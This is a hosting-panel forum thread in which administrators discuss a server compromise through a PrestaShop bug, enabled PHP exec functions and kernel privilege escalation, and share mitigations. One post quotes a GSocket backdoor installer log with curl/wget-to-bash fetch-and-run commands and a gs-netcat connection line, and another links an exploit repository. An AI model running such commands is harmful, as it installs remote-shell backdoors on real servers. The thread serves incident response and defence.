Possible attack on Keyhelp panels

Have you discovered a bug? Tell us about it.
User avatar
theqkash
Posts: 20
Joined: Wed 21. Dec 2022, 01:43

Re: Possible attack on Keyhelp panels

Post by theqkash »

It didn't have blank password. It's an attack, one of several ones, published last days. It allows any user in system to escalate privileges to root account, and then things like this are in logs. It is not a normal situation, but related to some actual security issue in kernel.
omexlu
Posts: 271
Joined: Wed 28. Aug 2024, 10:42

Re: Possible attack on Keyhelp panels

Post by omexlu »

@24unix the code is harmful, php and ssh, also the attacker installed GSocket.

The logs you shared show that a Global Socket (GSocket) backdoor has been installed on your server. Even if you believe there was no "SSH access," this tool provides the attacker with a permanent, interactive reverse shell that is even more dangerous than a standard SSH breach.
User avatar
24unix
Posts: 2232
Joined: Sun 21. Jun 2020, 17:16
Location: Kollmar
Contact:

Re: Possible attack on Keyhelp panels

Post by 24unix »

omexlu wrote: Thu 14. May 2026, 19:25 @24unix the code is harmful, php and ssh, also the attacker installed GSocket.
I said it is simple, not harmless.
Cheers Micha
--
Backup: The duplicate copy of crucial data that no one bothered to make;
used only in the abstract
Eoler
Posts: 21
Joined: Tue 2. Jul 2019, 01:20

Re: Possible attack on Keyhelp panels

Post by Eoler »

theqkash wrote: Thu 14. May 2026, 19:24 It didn't have blank password. It's an attack, one of several ones, published last days. It allows any user in system to escalate privileges to root account, and then things like this are in logs. It is not a normal situation, but related to some actual security issue in kernel.
Yes, they are all LPEs if user with shell access is compromised:
https://copy.fail/
https://ubuntu.com/blog/dirty-frag-linu ... -available
https://tuxcare.com/blog/fragnesia-cve- ... ernel-lpe/
omexlu
Posts: 271
Joined: Wed 28. Aug 2024, 10:42

Re: Possible attack on Keyhelp panels

Post by omexlu »

So how do we actually prevent that? My users don't have SSH access.
User avatar
theqkash
Posts: 20
Joined: Wed 21. Dec 2022, 01:43

Re: Possible attack on Keyhelp panels

Post by theqkash »

Once again, it doesn’t require ssh. You have to disable functions on php config of your sites to block possibility of running software, eg. exec, system, shell_exec, passthru

My users also didn’t had any ssh, but because user within php was able to run some software on functions like provided above, they was able to get out of their user context and work as root.
User avatar
theqkash
Posts: 20
Joined: Wed 21. Dec 2022, 01:43

Re: Possible attack on Keyhelp panels

Post by theqkash »

Eoler wrote: Thu 14. May 2026, 19:29 Yes, they are all LPEs if user with shell access is compromised:
The issue is, you don't need to give user SSH access. User needs just shell_exec or stuff and this is it.

Weird times...
Eoler
Posts: 21
Joined: Tue 2. Jul 2019, 01:20

Re: Possible attack on Keyhelp panels

Post by Eoler »

theqkash wrote: Thu 14. May 2026, 22:55 The issue is, you don't need to give user SSH access. User needs just shell_exec or stuff and this is it.
Weird times...
Yes, that's why I wrote "shell" and not "SSH"... ;-)
Look at this beauty - weird times indeed: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn
User avatar
Ralph
Posts: 1511
Joined: Mon 30. Mar 2020, 16:14

Re: Possible attack on Keyhelp panels

Post by Ralph »

In most cases ... the PHP function "fopen()" are used as an entry point for hacking outdated PHP applications (CMS).
User avatar
superjogi
Posts: 176
Joined: Sat 11. Jan 2020, 23:24

Re: Possible attack on Keyhelp panels

Post by superjogi »

Let us think about this for a moment.

So are you saying a client website was hacked and because the server was not patched with the recent rights escalation vulnerabilities it escalated to the server?

Or are you saying they hacked the panel directly similar to Wordpress?

Because these are 2 things.

Wordpress hacks I know and had occationally and cleaned them up.
I also saw that isolation of accounts is great.
kurgans
Posts: 42
Joined: Mon 2. Nov 2020, 12:57

Re: Possible attack on Keyhelp panels

Post by kurgans »

Yes... exactly as you're seeing, due to a Prestashop bug and the combination of enabled PHP functions, it was possible to download and execute a shell that bypasses all kernel controls.

Gaining unrestricted access to the entire environment

-> WARNING: Using existing secret from '/home/users/dominio-com//.config/htop/defunct.dat'
--> Trying x86_64-alpine
Downloading binaries........................................................ [OK]
Unpacking binaries.......................................................... [OK]
Copying binaries............................................................ [OK]
Testing binaries............................................................ [OK]
Testing Global Socket Relay Network.....................................[FAILED]
--> Secret ‘fcc’ is already used.
--> To uninstall, use GS_UNDO=1 bash -c “$(curl -fsSL https:)”
--> To connect, use one of the following:
--> gs-netcat -s “abc” -i
--> S="tzh" bash -c “$(curl -fsSL https:)”
--> S="abg" bash -c “$(wget -qO- https:)”

We were very lucky that Zabbix detected the problem and the tampering, issuing an alert, and the attacker only had time to install the shell

GS_UNDO=1 bash -c “$(curl -fsSL https://)”

and we were able to trace where it went and which files it included as root

s2
User avatar
superjogi
Posts: 176
Joined: Sat 11. Jan 2020, 23:24

Re: Possible attack on Keyhelp panels

Post by superjogi »

The information is useful.
You are hotlinking the virus. :D

How did you use Zabbix? Is it installed on each server, or is it a cloudinstance that used the other servers?
How did you mitigate the problem on the server? Delete the shell or were there new users?
User avatar
Henning
Posts: 217
Joined: Wed 6. Apr 2022, 16:19
Location: Oldenburg
Contact:

Re: Possible attack on Keyhelp panels

Post by Henning »

I'm following this thread very closely. It doesn't make me nervous, but I'd appreciate it if there could be some general information on whether, as an administrator, there's anything I can or need to do.
Freundliche Grüße von Henning
User avatar
Tobi
Community Moderator
Posts: 3674
Joined: Thu 5. Jan 2017, 13:24

Re: Possible attack on Keyhelp panels

Post by Tobi »

The best protection against this kind of attacks is:
1. Do not use outdated software
2. Allow only the PHP functions you need
3. Ensure hardest isolation of user accounts using KeyHelp Pro and SSH Chail
Gruß,
Tobi


-----------------------------
wewoco.de
Das Forum für Reseller, Digital-Agenturen, Bildschirmarbeiter und Mäuseschubser
User avatar
Tobi
Community Moderator
Posts: 3674
Joined: Thu 5. Jan 2017, 13:24

Re: Possible attack on Keyhelp panels

Post by Tobi »

@kurgans
Please do not post links to malware!
Always anonymize such content!
Thanks for your cooperation!
Gruß,
Tobi


-----------------------------
wewoco.de
Das Forum für Reseller, Digital-Agenturen, Bildschirmarbeiter und Mäuseschubser
Post Reply